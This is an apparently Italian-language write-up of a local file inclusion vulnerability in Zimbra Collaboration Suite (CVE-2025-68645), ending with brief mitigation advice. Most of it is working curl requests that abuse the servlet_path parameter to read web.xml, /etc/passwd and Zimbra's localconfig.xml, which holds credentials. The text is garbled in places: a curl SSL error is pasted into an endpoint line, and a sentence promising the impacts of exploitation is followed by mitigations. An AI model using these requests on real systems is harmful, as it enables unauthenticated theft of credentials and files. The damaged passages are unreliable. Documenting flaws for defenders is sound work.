
CVE-2025-68645
Questo documento descrive una vulnerabilità di Inclusione Locale di File (LFI) che interessa Zimbra Collaboration Suite.
Il problema deriva da una gestione impropria del seguente parametro:
/h/*?javax.servlet.include.servlet_path=
Ciò consente a un utente non autenticato di accedere a risorse interne dell'applicazione.
Richiesta di test:
curl -k "https://TARGET/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"


Più endpoint elaborano il parametro vulnerabile in modo diverso.
/h/printcalendar?javax.servlet.include.servlet_path=...
/h/restSSL: certificate subject name does not match target host
curl -k "https://TARGET/..."
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/etc/passwd"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/opt/zimbra/conf/localconfig.xml"
Uno sfruttamento riuscito può portare a:
Aggiornare Zimbra alle versioni con patch
Limitare l'accesso agli endpoint vulnerabili
Monitorare i log per parametri sospetti:
javax.servlet.include.servlet_pathImplementare regole WAF per bloccare pattern malintenzionati